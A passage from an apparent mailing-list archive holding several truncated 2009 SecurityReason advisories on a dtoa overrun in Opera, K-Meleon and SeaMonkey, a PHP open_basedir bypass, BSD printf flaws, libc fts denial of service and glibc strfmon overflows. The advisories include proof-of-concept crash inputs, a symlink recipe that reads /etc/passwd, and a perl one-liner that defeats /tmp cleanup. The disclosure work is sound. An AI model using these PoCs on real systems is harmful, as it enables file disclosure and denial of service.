http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c htt
[Full-disclosure] SecurityReason: Opera 10.01 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis.: 07.05.2009 - - Pub.: 20.11.2009 CVE: CVE-2009-0689 Risk: High Remote: Yes Affected Software: - - Opera 10.01 - - Opera 10.10 Beta NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/73 - --- 0.Description --- Opera is a Web browser and Internet suite developed by the Opera Software company. The browser handles common Internet-related tasks such as displaying Web sites, sending and receiving e-mail messages, managing contacts, IRC online chatting, downloading files via BitTorrent, and reading Web feeds. Opera is offered free of charge for personal computers and mobile phones. - --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Opera has a very similar dtoa algorithm to the BSD, Chrome and Mozilla products. It is the same issue like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. - --- 2. Proof of Concept (PoC) --- - --- var a=0.<?php echo str_repeat("9",29); ?>; - --- If we use Opera to see this PoC, Opera will crash. For example - --- var a=0.<?php echo str_repeat("1",296450); ?>; - --- OPERA-CRASHLOG V1 desktop 10.01 1844 windows Opera.exe 1844 caused exception C005 at address 67956906 (Base: 40) Registers: EAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=4200 ESI=C20471EC EDI= EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202 CS=001B DS=0023 SS=0023 ES=0023 FS=003B GS= FPU stack: C020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800 3FC78000 1001 0BBE0004 2EBA804E2FDE SW=0122 CW=027F 127# gdb -q opera opera.core ... Program terminated with signal 11, Segmentation fault. #0 0x2960307b in ?? () ... (gdb) i r eax0x71c71c71 1908874353 ecx0x2aa03be4 715144164 edx0x0 0 ebx0x296177f8 694253560 esp0xbfbfb650 0xbfbfb650 ebp0xbfbfb698 0xbfbfb698 esi0x2962d000 694341632 edi0x0 0 eip0x2960307b 0x2960307b ... (gdb) x/100x ($esi)-90 0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at address 0x2962cffe ... - --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - - OpenBSD - - NetBSD - - FreeBSD - - MacOSX - - Google Chrome - - Mozilla Firefox - - Mozilla Seamonkey - - KDE (example: konqueror) - - Opera - - K-Meleon This list is not yet closed. US-CERT declared that will inform all vendors about this issue, however, they did not do it. Even greater confusion caused new CVE number "CVE-2009-1563". Secunia has informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products like ( KDE, Chrome ) and it is based on "CVE-2009-0689". After some time Mozilla Foundation Security Advisory ("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";) was updated with note : "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)". This fact ( new CVE number for Firefox Vulnerability )and PoC in javascript (from Secunia), forced us to official notification all other vendors. We publish all the individual advisories, to formally show all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this issue in all products. - --- 4. Fix --- Opera fix: The vulnerability was fixed in the latest release candidate Opera RC3 : http://snapshot.opera.com/windows/Opera_1010_1890_in.exe In shortly time we can expect the final verion of Opera with the fix. NetBSD fix (optimal): http://cvsweb.netbsd.org/b
[Full-disclosure] SecurityReason: K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis.: 07.05.2009 - - Pub.: 20.11.2009 CVE: CVE-2009-0689 Risk: High Remote: Yes Affected Software: - - K-Meleon 1.5.3 NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/72 - --- 0.Description --- K-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout engine developed by Mozilla which is also used by Firefox. K-Meleon is free, open source software released under the GNU General Public License and is designed specifically for Microsoft Windows (Win32) operating systems. - --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. K-Meleon has the same dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in Firefox 3.5.4 and fix http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. - --- 2. Proof of Concept (PoC) --- - --- var a=0.<?php echo str_repeat("1",296450); ?>; - --- K-Meleon will crash with Unhandled exception at 0x01800754 in k-meleon.exe: 0xC005: Access violation reading location 0x0bc576ec. 01800754 mov eax,dword ptr [ecx] EAX 0002 ECX 0BC576EC EDI 028FEB51 - --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - - OpenBSD - - NetBSD - - FreeBSD - - MacOSX - - Google Chrome - - Mozilla Firefox - - Mozilla Seamonkey - - KDE (example: konqueror) - - Opera - - K-Meleon This list is not yet closed. US-CERT declared that will inform all vendors about this issue, however, they did not do it. Even greater confusion caused new CVE number "CVE-2009-1563". Secunia has informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products like ( KDE, Chrome ) and it is based on "CVE-2009-0689". After some time Mozilla Foundation Security Advisory ("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";) was updated with note : "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)". This fact ( new CVE number for Firefox Vulnerability )and PoC in javascript (from Secunia), forced us to official notification all other vendors. We publish all the individual advisories, to formally show all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this issue in all products. Please note: Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa algorithm is not optimal and allows remote Denial of Service in Firefox 3.5.5 giving long float number. - --- 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c http://w
[Full-disclosure] SecurityReason: SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis.: 07.05.2009 - - Pub.: 20.11.2009 CVE: CVE-2009-0689 Risk: High Remote: Yes Affected Software: - - SeaMonkey 1.1.18 Fixed in: - - SeaMonkey 2.0 NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/71 - --- 0.Description --- The SeaMonkey project is a community effort to develop the SeaMonkey all-in-one internet application suite (see below). Such a software suite was previously made popular by Netscape and Mozilla, and the SeaMonkey project continues to develop and deliver high-quality updates to this concept. Containing an Internet browser, email & newsgroup client with an included web feed reader, HTML editor, IRC chat and web development tools, SeaMonkey is sure to appeal to advanced users, web developers and corporate users. - --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. SeaMonkey has the same dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in Firefox 3.5.4 and fix http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42 has been used to patch SeaMonkey 2.0. This flaw has been detected in may 2009 and signed SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. - --- 2. Proof of Concept (PoC) --- - --- var a=0.<?php echo str_repeat("9",29); ?>; - --- If we use SeaMonkey to see this PoC, SeaMonkey will crash. For example - --- var a=0.<?php echo str_repeat("1",296450); ?>; - --- 127# gdb seamonkey-bin seamonkey-bin.core ... #0 0x28df0ecb in ?? () ... (gdb) i r eax0x0 0 ecx0x2 2 edx0xbfbfd2fc -1077947652 ebx0x28da9b6c 685415276 esp0xbfbfd2ac 0xbfbfd2ac ebp0xbfbfd2c8 0xbfbfd2c8 esi0xb 11 edi0xb 11 eip0x28df0ecb 0x28df0ecb ... esi = esi = 11 - --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - - OpenBSD - - NetBSD - - FreeBSD - - MacOSX - - Google Chrome - - Mozilla Firefox - - Mozilla Seamonkey - - KDE (example: konqueror) - - Opera - - K-Meleon This list is not yet closed. US-CERT declared that will inform all vendors about this issue, however, they did not do it. Even greater confusion caused new CVE number "CVE-2009-1563". Secunia has informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products like ( KDE, Chrome ) and it is based on "CVE-2009-0689". After some time Mozilla Foundation Security Advisory ("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";) was updated with note : "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)". This fact ( new CVE number for Firefox Vulnerability )and PoC in javascript (from Secunia), forced us to official notification all other vendors. We publish all the individual advisories, to formally show all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this issue in all products. Please note: Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa algorithm is not optimal and allows remote Denial of Service in Firefox 3.5.5 giving long float number. - --- 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/s
[Full-disclosure] PHP 5.2.11/5.3.0 Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 01.10.2009 - - Pub.: 13.11.2009 Risk: Medium Affected Software: - - PHP 5.3.0 - - PHP 5.2.11 Original URL: http://securityreason.com/achievement_securityalert/70 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/function.symlink.php ksymlink ? Creates a symbolic link bool symlink ( string $target , string $link ) - --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities --- The first main problem exist in security model based on symlinks open_basedir. Paths like $target and $link are checked by open_basedir. We can bypass open_basedir, but function symlink() is not affected. Issue has been generated by false security model designed by PHP. example: 127# cat sym.php 127# php sym.php PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 127# open_basedir will disallow /etc/passwd. Let`s see: 127# ls -la total 8 drwxr-xr-x 2 www www 512 Oct 20 00:33 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php - -rw-r--r-- 1 www www45 Oct 20 00:26 sym.php 127# pwd /www/test 127# cat kakao.php 127# php kakao.php 127# ls -la total 12 drwxr-xr-x 4 www www 512 Oct 20 00:37 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. drwxr-xr-x 4 www www 512 Oct 20 00:37 abc lrwxr-xr-x 1 www www27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php - -rw-r--r-- 1 www www45 Oct 20 00:26 sym.php drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink 127# cat exploit # passwd # root:*:0:0:god:/root:/bin/csh ... now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't need bypass open_basedir, it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd realy exists. So if we want read other file, we need create other structure. example "/usr/pkg/etc/php.ini": mkdir("usr"); chdir("usr"); mkdir("pkg"); chdir("pkg"); mkdir("etc"); chdir("etc"); mkdir("php.ini"); chdir(".."); chdir(".."); chdir(".."); PHP will confirm, that tmplink/../../../usr/pkg/etc/php.ini realy exist. Very important is removing fake link "tmplink" and we need to create in this same place dir with this same name. unlink("tmplink"); mkdir("tmplink"); This is the main trick here. Because, "tmplink" (dir) are only -1 deep, not -4. Under PHP 5.2.11 we can also bypass safe_mode. However, the security, such as whether to run suphp php with the privileges of users also have their drawbacks. We can use our exploit to show this vulnerability. If httpd allow read link (default), we can create symlink to / (ofcourse if we have access). If we can not read symlink, we can use next PHP flaw "hazard syphon" to read other files. example of php hazard (session) (open_basedir=/www): script0 "/www/test/.htaccess": php_value session.save_path "/www/test/notyetexists" file /www/test/notyetexists doesn`t exist (current) script1 "/www/test/sessrun.php" now we have 60 sec to run script2 script2 "/www/test/runin60.php": Hazard exist in PHP! Plan of action: 0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'. 1. Run script1, where first phase (SAPI) will check privileges to /www/test/notyetexists. But this file or dir, doesn't exists, so open_basedir will return false. 2. Script1 will generate sleep signal with 60sec delay. In this momemnt, we need run Scritp2. This script, will create link /www/test/notyetexists to /tmp or other directories. 3. Script1 after 60sec will run session_start() function, where privileges to /www/test/notyetexists aren't checked in this moment. In result, we can use function sleep() to create fake delay and first issue can help create symlinks. - --- 2. Exploit --- open_basedir bypass: http://securityreason.com/achievement_exploitalert/14 hazard analogy, as in this note - --- 3. Fix --- Fix not avaliable - --- 4. Greets --- sp3x Infospec Chujwamwdupe p_e_a pi3 - --- 4. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib {a.t] securi
[Full-disclosure] SecurityReason: Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ] Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 29.06.2009 - - Pub.: 30.10.2009 We are going inform all vendors, about this problem Affected Software (official): - - OpenBSD 4.6 - - NetBSD 5.0.1 probably more (macosx, chrome, firefox,..)... Original URL: http://securityreason.com/achievement_securityalert/69 - --- 0.Description --- printf(1) formats and prints its arguments, after the first, under control of the format. The format is a character string which contains three types of objects: plain characters, which are simply copied to standard output, character escape sequences which are converted and copied to the standard output, and format specifications, each of which causes printing of the next successive argument. SYNOPSIS printf format [arguments ...] The printf(3) family of functions produces output according to a format as described below. The printf(3) and vprintf(3) functions write output to stdout, the standard output stream; fprintf(3) and vfprintf(3) write output to the given output stream; sprintf(3), snprintf(3), vsprintf(3), and vsnprintf(3) write to the character string str; and asprintf(3) and vasprintf(3) write to a dynamically allocated string that is stored in ret. SYNOPSIS int printf(const char * restrict format, ...); - --- 1. Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities --- The first problem exists in usr.bin/printf/printf.c. printf(1) in NetBSD and OpenBSD, have problem with a field width and precision. Difference between printf(1) and printf(3) is that the printf(1) has its own filter for formating fmt. To see acceptable tags, use manual "man 1 printf". We can use char '*' in fmt, to declaring size in next arg. example: # printf %1.*f 1 1.2345 1.2 So, printf allow to use "*" in fmt. - --- ... fieldwidth = *fmt == '*' ? getint() : 0; ... - --- The problem is that the program does not verify the accuracy of fmt. It is possible to use '*' a few times => function getint() will be started a few times. getint() returns the value allocated in memory ( function printf(3) ). example: # printf %1.**f 1 1.2345 /* long exec. */ precision here, will be taken from stack. This means that the precision is the number retrieved from the stack. Further addition of the '*' char, will moving the pointer of precision. As a result, we try to appoint offset to control register esi and edi. But to do this, we need to change the fmt type of float to string . example (string): # printf %*s 666 Memory fault (core dumped) and we are in home. We need add "*" to try control esi and edi reg. # gdb -q printf (no debugging symbols found) (gdb) r "%*s" 666 Starting program: /usr/bin/printf "%*s" 666 (no debugging symbols found) (no debugging symbols found) Program received signal SIGSEGV, Segmentation fault. 0xbbba6a2a in __vfprintf_unlocked () from /usr/lib/libc.so.12 (gdb) i r eax0x0 0 ecx0x -1 edx0x0 0 ebx0xbbbd5b38 -1145218248 esp0xbfbfe320 0xbfbfe320 ebp0xbfbfec08 0xbfbfec08 esi0x29a666 edi0x29a666 esi and edi are 666 (netbsd) under openbsd, we have randomization, so it will be not so easy. - --- 727 size = p ? (p - cp) : prec; 728 } else { 729 size_t len; 730 731 if ((len = strlen(cp)) > INT_MAX) 732 goto overflow; 733 size = (int)len; 734 } 735 sign = '\0'; - --- program will crash in 731 line (strlen(cp)). Variable "cp" will be allocated in 666 addr in memory. So we can try manipulate of addr "cp" variable. That means that the shells are also affected (like /bin/sh /bin/csh) because printf is also used as a shell buit-in. We do not have accurate information, who uses a flawed implementation. printf(1) should use "IEEE 1003.1-2001" standard. Next problem with the printf(3) is very similar to "Multiple Vendors libc/gdtoa printf(3) Array Overrun" (SREASONRES:20090625) and concerns the implementation of gdtoa. We can try allocate a lot of memory, that malloc will generate crash. Issue has been detected in gdtoa from openbsd. NetBSD fix for (SREASONRES:20090625) is not affected and we thing that is better. Discrepancy theory, divided netbsd and openbsd. example: # printf %.11f 1.1 Segmentation fault (core dumped) ... (gdb) bt #0 __Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:75 #1 0x
[Full-disclosure] libc:fts_*() Multiple Denial of Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [libc:fts_*() Multiple Denial of Service ] Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 03.08.2009 - - Pub.: 02.10.2009 We are going inform all vendors, about this problem. Affected Software (official): - - OpenBSD 4.5 (fix available) - - NetBSD 5.0.1 (fix available) probably more... Original URL: http://securityreason.com/achievement_securityalert/68 - --- 0.Description --- The fts functions are provided for traversing UNIX file hierarchies. The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy. typedef struct _ftsent { unsigned short fts_info; /* flags for FTSENT structure */ char *fts_accpath; /* access path */ char *fts_path; /* root path */ size_t fts_pathlen; /* strlen(fts_path) */ char *fts_name; /* file name */ size_t fts_namelen; /* strlen(fts_name) */ short fts_level; /* depth (-1 to N) */ int fts_errno; /* file errno */ long fts_number; /* local numeric value */ void *fts_pointer; /* local address value */ struct _ftsent *fts_parent; /* parent directory */ struct _ftsent *fts_link; /* next file structure */ struct _ftsent *fts_cycle; /* cycle structure */ struct stat *fts_statp; /* stat(2) information */ } FTSENT; - --- 1. libc:fts_*() Multiple Denial of Service --- In March 2009, we have reported an issue (SREASONRES:20090304) in libc (fts.c). Now we want to present the conclusions and show the usefulness of this vulnerabality. Fix provided by OpenBSD Team will protect us by crash but we think, not for all cases, that are showed in this advisory. Index: fts.c === RCS file: /cvs/src/lib/libc/gen/fts.c,v retrieving revision 1.41 diff -u -p -r1.41 fts.c - - --- fts.c 27 Dec 2008 12:30:13 - 1.41 +++ fts.c 10 Feb 2009 09:00:24 - @@ -633,6 +633,14 @@ fts_build(FTS *sp, int type) len++; maxlen = sp->fts_pathlen - len; + if (cur->fts_level == SHRT_MAX) { + (void)closedir(dirp); + cur->fts_info = FTS_ERR; + SET(FTS_STOP); + errno = ENAMETOOLONG; + return (NULL); + } + level = cur->fts_level + 1; /* Read the directory, attaching each entry to the `link' pointer. */ So let`s see /etc/rc.d/cleartmp (NetBSD 5.0.1). This script use rm(1) with rf args. Line 40-41: find -x . ! -name . ! -name lost+found ! -name quota.user \ ! -name quota.group -exec rm -rf -- {} \; -type d -prune) here daemon will come to tmp_dir (/tmp) and wants clean it with the sequence "[a-km-pr-zA-Z]*". It will kill this script anytime when they will be started. So if we create directory "A" in /tmp, all other files and directories in alphabetical order, will not be delete. Proof of Concept: User cxib, have created exploit in main /tmp dir. exploit: 127# cd /tmp && perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and chdir $a }' In /tmp we have # ls -la total 22 drwxrwxrwt 10 root wheel 512 Aug 11 01:18 . drwxr-xr-x 27 root wheel 1024 Aug 11 00:09 .. drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix - -r--r--r-- 1 root wheel11 Aug 11 00:11 .X0-lock drwxrwxrwt 2 root wheel 512 Aug 11 00:11 .X11-unix - -rw-r--r-- 1 root wheel 0 Aug 11 01:18 A drwxr-xr-x 2 root wheel 512 Aug 11 01:15 B drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D - -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg drwx-- 2 root wheel 512 Aug 11 00:49 kde-root drwx-- 3 root wheel 512 Aug 11 01:14 ksocket-root drwx-- 2 root wheel 512 Aug 11 00:11 mc-root correct behavior will delete all files after reboot. So lets do it. # reboot Now we have in /tmp # ls -la total 18 drwxrwxrwt 9 root wheel 512 Aug 11 13:57 . drwxr-xr-x 27 root wheel 1024 Aug 11 14:02 .. drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix drwxrwxrwt 2 root wheel 512 Aug 11 01:19 .X11-unix drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D - -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg drwx-- 2 root wheel 512 Aug 11 00:49 kde-root drwx-- 3 root wheel 512 Aug 11 01:19 ksocket-root drwx-- 2 root wheel 512 Aug 11 00:11 mc-root file A and dir B has been deleted. But file chujwamwmuzg and directories {D,Cx22} are still avaliable. To resolve, we can use openbsd fix. However, this does not fully resolve the problem. The user can create a direcory (like Cx22) that can not be removed by rm(1). To remove Cx22 folder, we can use program made by openbsd - --- #i
[Full-disclosure] SecurityReason: glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 10.03.2008 - - Pub.: 17.09.2009 CVE: CVE-2008-1391 Risk: High Affected Software (tested 27.08.2009): - - Fedora 11 - - Slackware 12.2 - - Ubuntu 9.04 - - others linux distributions Original URL: http://securityreason.com/achievement_securityalert/67 Previous URL: http://securityreason.com/achievement_securityalert/53 - --- 0.Description --- strfmon -- convert monetary value to string The strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. No more than maxsize bytes are placed into the array. The format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the output stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each conversion specification is introduced by the % character. SYNOPSIS: #include ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...); - --- 1. glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities --- In March 2008, our team has published a security note (SREASONRES:20080325) about vulnerabilities in strfmon(3) function. Issue has been officially diagnosed in NetBSD, FreeBSD and MacOSX. However, from the source code due to a glibc also is vulnerable to. We have informed glibc team. However, the description of the issue and fix was not enough for gnu team. They has changed status for BOGUS and response was: - --- And what exactly does an BSD implementation has to do with glibc? - --- Today we now, only NetBSD is secure for this. And all systems uses glibc are affected. Despite the differences in the code NetBSD libc and glibc, issue is the same but the exploit differs from that presented in (SREASONRES:20080325). Description of the vulnerabalitie: http://securityreason.com/achievement_securityalert/53 (SREASONRES:20080325) http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/ Description of the fix: ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-006.txt.asc To present this issue in Fedora 11, we will use php client. money_format() use strfmon(3) function so this program will be perfect. [...@localhost ~]$ php -r 'money_format("%.1073741821i",1);' Segmentation fault for 'money_format("%.1073741821i",1);' we will get Program received signal SIGSEGV, Segmentation fault. 0x0019331a in __printf_fp () from /lib/libc.so.6 (gdb) bt #0 0x0019331a in __printf_fp () from /lib/libc.so.6 #1 0x0018832b in __vstrfmon_l () from /lib/libc.so.6 #2 0x00187a36 in strfmon () from /lib/libc.so.6 strfmon() will call to __printf_fp() with overflowed arg. In result (gdb) x/20s ($esi)-10 0x8448ff6: "" 0x8448ff7: "" 0x8448ff8: "0" 0x8448ffa: "" 0x8448ffb: "" 0x8448ffc: "0" 0x8448ffe: "" 0x8448fff: "" 0x8449000: 0x8449000: 0x8449000: ... (gdb) i r eax0x30 48 ecx0x0 0 edx0x0 0 ebx0x2bdff4 2875380 esp0xbfffec14 0xbfffec14 ebp0xbfffed78 0xbfffed78 esi0x8449000138711040 edi0x810c 33036 eip0x19331a 0x19331a <__printf_fp+3274> Now let's see what will hapen for 'money_format("%.1073741822i",1);' Program received signal SIGSEGV, Segmentation fault. 0x0034b27b in hack_digit.12295 () from /lib/libc.so.6 php will crash in hack_digit(). (gdb) i r eax0x3ffe 1073741822 ecx0x32 